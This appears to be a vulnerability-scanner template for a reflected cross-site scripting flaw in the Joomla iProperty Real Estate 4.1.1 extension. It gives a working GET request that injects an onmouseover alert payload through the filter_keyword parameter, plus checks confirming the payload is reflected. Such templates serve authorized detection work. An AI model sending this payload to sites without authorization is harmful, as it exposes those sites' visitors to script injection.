product: Joomla
vName: Joomla iProperty Real Estate 4.1.1 - Cross-Site Scripting
type: 跨站脚本
vID: [ ]
level: 2
vDesc: Joomla extension iproperty is vulnerable to XSS in GET parameter 'filter_keyword'.
version: ''
note: ''
search: { }
protocol: http
link: https://www.exploit-db.com/exploits/51640
fix:
  - 建议联系软件厂商进行处理。
model: ''
logic: and
exploit:
  - exp:
      method: get
      follow: false
      path: /iproperty/property-views/all-properties-with-map?filter_keyword=pihil%22onmouseover=%22alert(document.domain)%22style=%22position:absolute;width:100%;height:100%;top:0;left:0;%22f63m4&option=com_iproperty&view=allproperties&ipquicksearch=1
    verify:
      logic: and
      check:
        - body:
            value:
              - onmouseover="alert(document.domain)"style=
              - real estate
            logic: and
        - status: 200
